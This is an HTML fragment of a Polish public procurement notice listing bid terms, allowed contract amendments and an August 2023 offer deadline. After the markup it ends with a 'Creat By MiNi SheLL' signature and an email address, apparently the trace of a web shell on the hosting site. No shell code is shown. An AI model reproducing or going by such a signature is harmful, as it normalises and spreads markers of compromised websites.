class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany postanowień niniejszej umowy w przypadku: <br/>1) gdy Wykonawca zaoferuje ceny jednostkowe korzystniejsze niż zaoferował w ofercie;<br/>2) zmiany obowiązującej stawki podatku od towarów i usług (VAT);<br/>3) zmian adresowych, rejestrowych lub zmian osób upoważnionych do realizacji umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/800362</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-10 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com